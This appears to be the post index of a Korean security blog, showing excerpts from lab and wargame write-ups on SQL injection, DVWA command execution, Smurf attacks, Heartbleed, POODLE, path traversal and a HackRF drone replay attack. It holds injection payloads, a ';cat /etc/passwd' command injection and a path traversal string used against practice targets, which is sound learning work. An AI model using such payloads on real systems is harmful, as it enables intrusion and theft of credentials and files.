본문 바로가기

Security112

Scapy를 이용한 tcp 통신(+패킷 재전송 및 변조) scapyscapy에 대한 자세한 설명은 아래 사이트에 나와있다.https://scapy.readthedocs.io/en/latest/Welcome to Scapy’s documentation! — Scapy 0 documentation© Copyright 2008-2020 Philippe Biondi and the Scapy community Revision 0f34ce77.scapy.readthedocs.io 3-way handshake123456789 #3 way handshake ip=IP(src="192.168.30.2", dst="192.168.30.3") syn_packet = TCP(sport=50000, dport=60000, flags="S", seq=100) synack_packet .. 2020. 6. 28.
산업제어시스템 보안 가이드 산업제어시스템(ICS) 보안 가이드(NIST SP 800-82 [Guide to Industrial Control Systems(ICS) Security]) https://www.krcert.or.kr/data/guideView.do?bulletin_writing_sequence=35433&queryString=YnVsbGV0aW5fd3JpdGluZ19zZXF1ZW5jZT0zNTQzMw== 2020. 5. 23.
Smurf Attack * Smurf Attack-> 원리Attacker가 출발지 IP를 Victim의 IP로 Spoofing하여 ICMP Request패킷을 시스템이 아주 많은 네트워크를 Broadcast하면 해당 패킷을 받은 네트워크가 Victim에게 ICMP Reply패킷을 대량으로 보내는 공격이다. -> 대응책1. 라우터에서 Direct Broadcast를 차단한다. (대부분의 라우터에서 이미 Default로 차단되어 있다.) [실습]실습을 진행하기 전 아래와 같이 토폴로지를 구성한다. - R1 : Attacker - R3 : VictimR1이 10.1.1.0 대역으로 R3의 IP로 Spoofing한 ICMP Request패킷을 Broadcast하여 10.1.1.0 네트워크가 R3로 대량의 ICMP Reply을 받을 수.. 2020. 3. 12.
PentesterLab 2 SQL Injection Example 1 (MAKE IT TRUE) PoC Example 2 (LIMIT-MAKE IT TRUE) PoC limit 함수반환되는 출력수를 제한하는 함수임 반환 행 수 제한 우회사용자 로그인 시, 쿼리에서 반환되는 사용자가 1명이도록 소스코드에서 제한하는 경우가 있음limit 함수를 사용하면 반환되는 행 수를 제한할 수 있으므로 이를 이용하면 됨 Example 3 (ESCAPE-MAKE IT TRUE) Hint싱글 쿼터를 입력해도 에러 메세지가 반환되지 않음 PoC Normal QuerySELECT * FROM users WHERE username='root' AND password='qwer'; Injection QuerySELECT * FROM users WHERE u.. 2020. 3. 8.
PentesterLab 1 SQL Injection Example 1 (STRING TYPE-MAKE IT TRUE)http://192.168.30.129/sqli/example1.php?name=root PoChttp://192.168.30.129/sqli/example1.php?name=root' or '1'='1http://192.168.30.129/sqli/example1.php?name=root' or 1=1-- -http://192.168.30.129/sqli/example1.php?name=root' or 1=1%23 주석 필터링 우회%23 : # MySQL 주석1. #2. -- (뒤에 공백이 있어야 주석으로 동작함)3. /**/ Example 2 (ERROR NO SPACE-MAKE IT TRUE)http://192.. 2020. 3. 6.
DVWA(Damn Vulnerable Web Application) Brute Force Low, MediumSTEP 1) 로그인 페이지의 Username과 Password 입력란에 임의의 문자열을 넣고 Login버튼을 눌렀더니 username, password 파라미터로 값이 전달되는 것을 확인했습니다. STEP 2) Brute Force 공격을 수행 후, 결과로 Length 길이가 다른 Payload1과 Payload2를 확인하였습니다. STEP 3) 획득한 Payload값을 각각 Username, Password에 입력하여 로그인하였습니다. Command Execution LowSTEP 1) ping이 가능한 입력 란에 ping 대상 IP주소와 여러 개의 명령어를 한 줄에 실행시킬 수 있는 문자인 ‘;’와 cat /etc/passwd 명령어를 적고 submit버튼을.. 2020. 3. 3.
CVE-2014-3566 (POODLE) POODLE(Padding Oracle On Downgraded Legacy Encryption) Padding Oracle On Downgraded Legacy Encryption 그대로 해석하면 다운 그레이드 된 레거시 암호화의 패딩 오라클(특정 입력을 받아 암호화 작업을 수행하는 시스템)이다. Downgraded Legacy Encryption는 SSL3.0로 Downgrade, Padding Oracle은 SSL3.0의 블록 암호화의 패딩 검증 취약점이라고 생각하면 된다. 즉, SSL3.0 취약점(블록 암호 암호의 패딩 검증)을 이용한 암호 해독 공격이다. cve : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 조건 1) SSL 3... 2020. 2. 24.
CVE-2014-0160 (HeartBleed) HeartBleed - OpenSSL의 RFC6520 TLS/DTLS Heartbeat extension 구현이 표준을 따르지 않고 구현된 사실이 밝혀졌는데, 해당 취약점을 이용한 정보 탈취 공격이다. CVE : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 조건 1) 영향받는 버전 - OpenSSL 1.0.1 ~ OpenSSL 1.0.1f - OpenSSL 1.0.2-beta, OpenSSL 1.0.2-beta1 2) 영항받지 않는 버전 - OpenSSL 1.0.1g - OpenSSL 1.0.0대 버전 - OpenSSL 0.9.8대 버전 원리 OpenSSL 정해진 규격의 네트워크 보안 프로토콜을 범용 라이브러리를 구현하기 위한 목적으로 만들.. 2020. 2. 24.
JNI (Java Native Interface) 보호되어 있는 글 입니다. 2019. 6. 7.
Robots.txt 파일 Robots.txt 파일 개요 1. 검색 엔진 크롤러가 웹 사이트에 요청할 수 있거나 요청할 수 없는 파일을 크롤러에 지시하는 파일임(즉, Robots.txt파일을 설정하지 않으면 구글, 네이버 등 각종 검색 엔진 크롤러들이 웹 사이트에서 찾을 수 있는 모든 정보를 크롤링하여 검색엔진 검색결과에 노출시킴) 2. 검색엔진 접속을 차단하기 위해 등록된 파일이지만, 사용자가 직접 해당 컨텐츠 내용을 확인할 수 있음(즉, 중요한 디렉터리 등이 무엇인지를 파악할 수 있는 정보로 악용이 가능함) 3. 사이트의 루트에 위치Ex) http://www.~~.com 사이트인 경우에 robots.txt파일은 http://www.~~.com/robots.txt에 위치함 사용법User-Agent 은 검색엔진을 뜻하고, Disa.. 2019. 3. 22.
los https://los.eagle-jump.org/ gremlin select id from prob_gremlin where id='' or 1=1%23' and pw=''주석(#)이 삭제되므로 URL 인코딩해서 넣음 coboltselect id from prob_cobolt where id='admin'%23' and pw=md5('')admin id가 select되도록 함주석(#)이 삭제되므로 URL 인코딩해서 넣음 goblinselect id from prob_goblin where id='guest' and no=0 or id=char(97,100,109,105,110)and연산을 Flase로(id가 guest인 것을 Flase), id가 admin인 것을 True로 만듬싱글쿼터를 필터링하여 'a.. 2018. 11. 26.
webhacking.kr http://webhacking.kr/ 회원가입Register버튼이 주석되어 있음 / base64 디코딩 후 회원가입 6https://이혜빈.kr/386?category=821512디코딩 20번하길래 인코딩 20번 함 14https://이혜빈.kr/389?category=821512document.URL은 현재 url을 반환함. indexOf함수로 .kr문자열이 있는 위치를 반환하고 30을 곱함 15https://이혜빈.kr/384?category=821512burp suite로 확인하면 바로 인증값 보임 17https://이혜빈.kr/391?category=821512burp suite로 인증 값 바로 출력하게 불필요한 코드 삭제함 24https://이혜빈.kr/400참고로 extract()함수는 배열.. 2018. 11. 19.
wargame.kr http://wargame.kr/ already gotfiddler로 response header를 살펴보니 flag가 있었음 flee buttonp8.js파일에 있는 unescape_blue14함수를 실행시켰더니 난독화를 푼 코드가 보였고, 거기에 클릭시 이동하는 파라미터가 있었음. 해당 파라미터를 붙여 이동하면 flag가 나옴 QR CODE PUZZLEunescape함수를 실행시키니 png파일이 나왔음png파일에 있는 QR코드를 스캔하니 url주소가 나왔고, 해당 url주소로 들어가니 flag가 있었음 login filtering WTF_CODE.ws 확장자를 찾아보니 whitespace language파일이었음. 실행시키니 flag가 나옴 fly me to the moon31337점수를 얻어야 한다.. 2018. 11. 17.
Hacker Factory https://hackerfactory.co.kr/ 초급1burp suite로 파라미터 값 변경하니 풀림 2burp suite로 파라미터 값 변경하니 풀림 3burp suite로 파라미터 값 변경하니 풀림 4정상적으로 Text.txt를 다운받는 파라미터는 FileName=Text.txt인데 FileName=./Text.txt, FileName=../Text.txt, FileName=/Text.txt 로도 다운받아지니 ./ ../ /가 필터링되어 있는 것 같다????....//....//....//....//....//....//....//....//temp/hacktory.txthimt83HTCdn7haRklK04qD/13SEwPJhF 2018. 11. 14.
Replay Attack 안녕하세요!!오늘은 HackRF One을 이용한 Replay Attack에 대해서 포스팅해보려고 합니다. ※ 틀린 정보가 있을 수 있으니 참고만 해주시길 바라겠습니다. ㅠㅠ 위의 사진은 Dork94님께 빌린 HackRF One입니다.(★흔쾌히 빌려주신 Dork94님 감사합니다.ㅠㅠ★) Replay Attack으로 위 사진의 드론이 날아갔던 경로를 그대로 재현해보려고 합니다.(★가성비 갑! 드론 추천해주신 d0ub1essh님 감사합니다!!ㅎㅎ★) 우선 드론이 사용하는 대역을 알아봅니다.이 드론은 조종기를 보시면 2.4G대역을 사용한다고 적혀있습니다. gqrx로 확인해 보았습니다.확실하지 않을 수도 있는데 제가 확인해본 바로는 조종기를 켜면 빨간색 원 안에 있는 것이 요동쳤고, 드론과 동기화를 하면 파란색 .. 2018. 11. 1.